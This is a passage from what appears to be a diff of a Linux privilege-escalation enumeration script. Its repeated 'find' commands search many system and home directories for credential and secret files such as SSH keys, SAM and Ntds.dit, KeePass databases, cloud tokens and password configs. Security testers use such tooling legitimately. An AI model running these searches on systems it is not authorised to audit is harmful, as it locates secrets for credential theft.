\"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"*knockd*\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_APPLICATIONS=`eval_bckgrd "find /applications -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_BIN=`eval_bckgrd "find /bin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CACHE=`eval_bckgrd "find /.cache -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_CDROM=`eval_bckgrd "find /cdrom -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_ETC=`eval_bckgrd "find /etc -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"system.d\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MEDIA=`eval_bckgrd "find /media -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_MNT=`eval_bckgrd "find /mnt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_OPT=`eval_bckgrd "find /opt -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_PRIVATE=`eval_bckgrd "find /private -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SBIN=`eval_bckgrd "find /sbin -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SNAP=`eval_bckgrd "find /snap -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_SRV=`eval_bckgrd "find /srv -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_TMP=`eval_bckgrd "find /tmp -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_USR=`eval_bckgrd "find /usr -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_DIR_VAR=`eval_bckgrd "find /var -type d -name \".bluemix\" -o -name \"sites-enabled\" -o -name \"keyrings\" -o -name \".cloudflared\" -o -name \"seeddms*\" -o -name \".irssi\" -o -name \"neo4j\" -o -name \"zabbix\" -o -name \"mysql\" -o -name \"logstash\" -o -name \"ldap\" -o -name \"bind\" -o -name \"environments\" -o -name \"couchdb\" -o -name \"postfix\" -o -name \"roundcube\" -o -name \"cacti\" -o -name \"filezilla\" -o -name \".svn\" -o -name \".vnc\" -o -name \"sentry\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_APPLICATIONS=`eval_bckgrd "find /applications -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_BIN=`eval_bckgrd "find /bin -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name 